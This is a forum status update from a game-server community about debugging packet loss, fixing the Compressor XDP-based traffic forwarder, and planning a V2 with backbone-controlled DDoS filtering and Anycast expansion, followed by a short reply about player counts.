@dagreek ordered a new 1 TB SSD for the GS2990wx machine, which recently suffered a hard drive corruption/failure. These machines weren't meeting our performance expectations, and we had to move our game servers over to our new hosting provider. However, I am not counting these machines out! I still think the hardware (processor, RAM, and storage) is great, and if we can find out what was causing the performance issues (more than likely network-related), we can still use these machines for some of our game servers, at least any that want to be located in NYC. I forgot to mention, we aren't paying for these machines either!
I will be launching an investigation into these performance issues. I will start by writing C software that can stress-test the machine's NIC to see if that is the bottleneck, and I will do other testing as well. I also want to see if the issue exists on the GS3900x machine, since I've only seen reports from servers on the GS2990wx machine (e.g. I wonder if the previously corrupted hard drive may have been causing the issues). Now that we don't have any active game servers running there, I won't need to worry about debugging taking the game servers down!
Once I have an update on this, I will let everybody know!
Packet Loss On Machine With New Hosting Provider
One thing I've noticed while playing on our CS:S 24/7 Dust2 server, which runs on the machine with the new hosting provider, is 1 - 4% packet loss during busy times. This is obviously a concern, but I haven't seen any noticeable performance issues while it occurs. I had other users check as well, and they were also seeing 1 - 4% packet loss at the time. The route from my city to the game servers appears to be fine.
My suspicion is that packets being sent from the game server machine back to the Chicago POP are not making it in time; an MTR from the game server machine to the POP server shows packet loss at the POP. I've been doing a lot of debugging, and the POP's load was only at ~50% when I saw these issues. I've also seen packet loss when the POP's load was only around 30 - 35%. The POP has two cores, and using the perf top -a --sort cpu command, I could see one CPU at 65% and the other at around 33%. Compressor should be multi-threaded and using all RX queues, and the fact that both CPUs had load should prove that.
I think this might be an issue with our POP hosting provider's edge. I plan to make a ticket regarding this at some point.
Something else that will probably fix this issue is running the TC BPF program I made. I noticed similar symptoms on the NYC machines weeks ago, and after running the TC BPF program, the symptoms went away (e.g. 0% packet loss at busy times).
I will continue investigating to see if I can narrow down the issue. Unfortunately, it's quite difficult to debug since XDP doesn't offer much visibility here. Once the ACL rules are removed, we'll be running the TC BPF program anyways.
Anycast Infrastructure
I asked @Ben to start searching for new hosting providers that support BGP sessions based off of this list. I want to see if we can get 2 - 3 new hosting providers ready for when we expand our Anycast infrastructure (after we make Compressor V2, read below). If we can get the infrastructure expansion plan down now, it'll be a lot less work to do after creating Compressor V2.
One thing I also plan to work on is getting XDP-native support working with our POP servers. This will let us mitigate much larger (D)DoS attacks, since we'll likely be able to drop around 8 - 10x more packets per second than with XDP-generic. This will be really helpful with Compressor V2 (read below).
Ben plans to do this in the next month. I can also do it if he doesn't get around to doing so, but it'll be a lot of communication work. Though, I had to do this quite a bit before when emailing 30+ hosting providers last time, lol.
Compressor V1 Issues
I am currently making modifications to the current Compressor project created by @Dreae. I created a GitHub fork here that already has two commits. One commit spreads traffic redirected to the AF_XDP socket over all RX queues on the NIC, which resolved an issue we hit back when we tried using Hivelocity as a POP server in NYC (in our case, A2S_INFO caching wasn't working properly). The other commit simply passes non-forwarded ICMP replies to the network stack to help with debugging a POP server.
The next issue I plan to address is TCP connections not working properly. I'm not sure exactly what is wrong, and the code appears to be fine. TCP connections over Compressor have been an issue since the start, resulting in slow speeds, timeouts, and more. I've done debugging and confirmed requests are being received and sent back by Compressor. Rate limiting and connection limits aren't the issue either, since I tried increasing them in my local environment and saw the same behavior.
Once I find a fix for this, I plan to correct my existing pull request that I completely screwed up last night (sorry @Dreae, I'm new to Git pull requests!).
Compressor V2
Compressor V2 is a MAJOR project @Dreae and I will be working on. It will be a huge improvement over Compressor V1, and I want it created before expanding our Anycast infrastructure. We are still designing the layout of it all (well, mostly Dreae, since he's far ahead of me when it comes to programming/networking). I am currently learning Elixir, which will be used for the backbone and more, so I can help contribute to the project. With that said, I plan to help with the design as well if needed.
Compressor V2 will have the following advantages over Compressor V1:
- All POPs will be controlled by a backbone. This makes it easy to add POP servers, game servers, and so on. This will also make it so we don't have to restart Compressor each time we need to update the config.
- Will be capable of filtering large (D)DoS attacks based on filtering rules that can be added on the backbone.
- Malicious traffic will be dropped via XDP (see a comparison here).
- Forwarding and so on will occur in user space, allowing us to debug traffic via tcpdump and catch attacks (currently not possible with Compressor V1, since XDP forwards packets before they reach the network stack).
- TCP connections will work without any issues.
- Will perform plain NAT to each POP server and vice versa. This will be more reliable than the current method and better performing in most cases as well. It will also remove the need for the TC BPF program I made and give us more control over routing.
The project will be using a mixture of C, XDP/TC/BPF, IPTables, Elixir, Rust or GoLang, and more!
This is definitely something I'm very excited about as well. This is the type of project a team of highly paid engineers would normally be assigned to. Therefore, the fact that we're building it without being paid is pretty neat!
Once I have more details on this project and an official game plan, I will let you all know!
Conclusion
That's basically it. As you can see, I am keeping myself busy! I am pretty excited to start troubleshooting some of these issues and work on the new projects such as Compressor V2.
If you have any questions, please let me know!
Thank you for your time.




We've Hit 1000+ Active Players On All Game Servers At The Same Time!
in General Discussion
Posted
I'm not sure about overall population, but we were hitting 900 - 950 peak players around January (before COVID-19 blew up). Though, we've definitely seen a spike in population, especially with CS:S. Here is CS:S's SteamDB graph:
Sadly seems to be going back down now